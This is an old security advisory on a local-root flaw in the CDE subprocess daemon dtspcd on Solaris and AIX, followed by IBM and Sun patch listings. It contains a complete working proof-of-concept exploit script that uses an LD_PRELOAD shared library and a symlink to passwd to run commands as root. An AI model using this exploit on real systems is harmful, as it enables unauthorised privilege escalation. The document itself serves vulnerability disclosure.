

    Solaris 2.x, 7, AIX, 4.1.x, 4.2.x, 4.3.x


    Job de Haas found following.  He discovered the following security
    problem  in  dtspcd,  part  of  CDE.   The  CDE  subprocess daemon
    /usr/dt/bin/dtspcd  contains  an  insufficient  check  on   client
    credentials.   The insufficient  check can  lead to  a local  root

    The  CDE  subprocess  daemon  allows  cross-platform invocation of
    applications. To achieve this it is registered by inetd:

        dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd

        dtspc           6112/tcp                        # CDE subprocess control

    In order to authenticate the  remote user, the daemon generates  a
    filename which is to be created by the client and then is verified
    by the daemon.  When  verifying the created file, the  daemon uses
    stat()  instead  of  lstat()  and  is subsequently vulnerable to a
    symlink attack.   Further more  the daemon  seems to  allow  empty
    usernames  and  then  reverts  to  a publicly write-able directory
    (/var/dt/tmp).  Job discovered  this accidentally, but later  read
    that also  unreadable home  directories result  in this  behavior.
    The process can  be followed fairly  well by setting  the -log and
    -debug options on dtspcd (in  /etc/inetd.conf).  It will create  a
    log file  in /var/dt/tmp/DTSPCD.log.   This will  show information

        --> REGISTER channel: 0, request: 4, length: 33, seq: 1 data: 4
             Client protocol version is '1000'.: Mon Sep 13 10:32:33 1999
        +++> Authentication file is '/var/dt/tmp/.SPC_AAA0RIUwK'.: Mon Sep 13 ..

    Both  these  bugs  can  be  combined  to convince dtspcd it should
    execute  an  action  as  root.   The  script  below  performs  all
    necessary actions on a Solaris host.  It makes use of the dtaction
    command of which the behavior is modified by pre-loading a  shared
    library with modified libc functions.

    Another feature of dtspcd, which was not obvious to me, is that it
    will allow remote  access to all  systems that share  NFS exported
    home directories without requesting a password.  Shell script:

    # dtspaced
    # Demonstration of local root hole with dtspcd.
    # Job de Haas
    # (c) 1999 ITSX bv
    # Mechanism is as follows:
    #   - dtaction requests the action 'Execute' through dtspcd.
    #   - dtscpd request a filename to be created which it will check for
    #     owner/suid bit.
    #   - BUG1: dtspcd allows creation in a public directory (with empty
    #           username).
    #   - BUG2: and forgets to check if the file is a symlink.
    #   - dtaction will create a symlink to a suid root binary and reply.
    #   - dtspcd considers dtaction authenticated and executes requested file
    #     as root.
    # suggested fix: use lstat or refuse a symlink and why allow an empty
    #                username?
    # exploit uses a shared lib to replace some functions to do what we want.
    # Note that these are not used by dtspcd but by dtaction. The script executed
    # by dtaction as root creates a file /tmp/root_was_here.
    # tested on Solaris 2.5.1, 2.6 and 7
    if [ -f /tmp/root_was_here -o -d /tmp/root_was_here ]; then
       echo "/tmp/root_was_here already exists"
    if [ "X$DISPLAY" = "X" ]; then
       echo "need to set DISPLAY"
    cat > /tmp/dtspaced.c << EOF
    #include <pwd.h>
    #define O_CREAT 0x100
    #define O_RDONLY 0
    #if __SunOS_5_5_1
    #define open64  open
    #define _open64 _open
    open64(const char * filename, int flag, int mode)
        if ((flag & O_CREAT) && ( strstr( filename, "SPC") )) {
            symlink( "/usr/bin/passwd", filename);
            filename = (char *)strdup("/tmp/shit");
        return(_open64(filename, flag, mode));
    chmod(const char * filename, int mode)
        _chmod( filename, mode);
    struct passwd *getpwuid(uid_t uid)
        struct passwd *pw;
        pw = (struct passwd *)_getpwuid(uid);
        pw->pw_name = (char *)strdup("");
    cat > /tmp/doit << EOF
    unset LD_PRELOAD
    /usr/bin/touch /tmp/root_was_here
    chmod a+x /tmp/doit
    mkdir /tmp/.dt
    cat > /tmp/.dt/hack.dt << EOF
    set DtDbVersion=1.0
    ACTION Execute
	    LABEL		Execute
            TYPE            COMMAND
            WINDOW_TYPE     NO_STDIO
            EXEC_STRING     \
	      "%(File)Arg_1"File To Execute:"%"
	    DESCRIPTION	The Execute action runs a shell script or \
                            binary executable. It prompts for options and \
                            arguments, and then executes the script or \
                            executable in a terminal window.
    # make a copy of dtaction so it is not suid root and will accept LD_PRELOAD
    cp /usr/dt/bin/dtaction /tmp
    echo "Compiling shared lib..."
    cc -c /tmp/dtspaced.c -o /tmp/dtspaced.o
    ld -G /tmp/dtspaced.o -o /tmp/
    export LD_PRELOAD
    echo "Executing dtaction..."
    /tmp/dtaction -execHost Execute /tmp/doit
    unset LD_PRELOAD
    /bin/rm -f /tmp/doit /tmp/dtaction /tmp/shit /tmp/dtspaced.*
    /bin/rm -rf /tmp/.dt
    if [ -f /tmp/root_was_here ]; then
       echo "created file /tmp/root_was_here"
       echo "exploit failed..."


      The following APARs will be available soon:

        AIX 4.1.x:  IY03125  IY03847
        AIX 4.2.x:  IY03105  IY03848
        AIX 4.3.x:  IY02944  IY03849

    Customers that do  not require the  CDE desktop functionality  can
    disable CDE by restricting access to the CDE daemons and  removing
    the dt entry  from /etc/inittab.   For customers that  require the
    CDE  desktop  functionality,  a  temporary  fix  is  available via
    anonymous ftp from:

    Sun Microsystems
      The following patches are available:

        CDE version         SunOS version                   Patch ID
        ___________         _____________                   _________
        1.3                 5.7                             108221-01
        1.3_x86             5.7_x86                         108222-01
        1.2                 5.6                             108199-01
        1.2_x86             5.6_x86                         108200-01
        1.0.2               5.5.1, 5.5, 5.4                 108205-01
        1.0.2_x86           5.5.1_x86, 5.5_x86, 5.4_x86     108206-01
        1.0.1               5.5, 5.4                        108252-01
        1.0.1_x86           5.5_x86, 5.4_x86                108253-01

    Santa Cruz Operation (SCO) and SGI are investigating the issue.